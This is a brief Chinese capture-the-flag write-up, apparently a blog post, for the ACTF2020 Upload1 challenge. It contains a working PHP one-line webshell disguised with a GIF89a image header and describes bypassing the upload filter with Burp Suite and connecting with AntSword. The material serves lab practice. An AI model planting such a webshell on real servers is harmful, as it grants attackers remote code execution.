1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
2、使用bp抓包修改后缀,点击发送
3、不关浏览器的代理,在bp中将该包放行
4、用蚁剑连接
5、在根目录中找到flag
[ACTF2020 新生赛]Upload1
不拿flag不改名2024-09-12 13:20
相关推荐
Java资深爱好者3 小时前
Android中的AsyncTask。tangweiguo030519873 小时前
android 支持自定义布局、线程安全、避免内存泄漏的 Toast 工具类Goober Airy4 小时前
PHP:无框架、不配置服务器,仅利用URL规则设置路由JasonAndChen5 小时前
Android Studio 一直 Loading devices顾林海7 小时前
深入探索Android IPC:解锁进程间通信的奥秘etcix10 小时前
todo: 使用融云imserve做登录(android)ljx140005255012 小时前
Android AudioFlinger(二)——AndroidAudio Flinger的启动流程Wgllss12 小时前
该怎么学Android进阶,拒绝沦为高级三方SDK调用工程师?工程师老罗14 小时前
用DeepSeek学Android开发:Android初学者遇到的常见问题有哪些?如何解决?居然是阿宋14 小时前
理解 UDP 协议与实战:Android 使用 UDP 发送和接收消息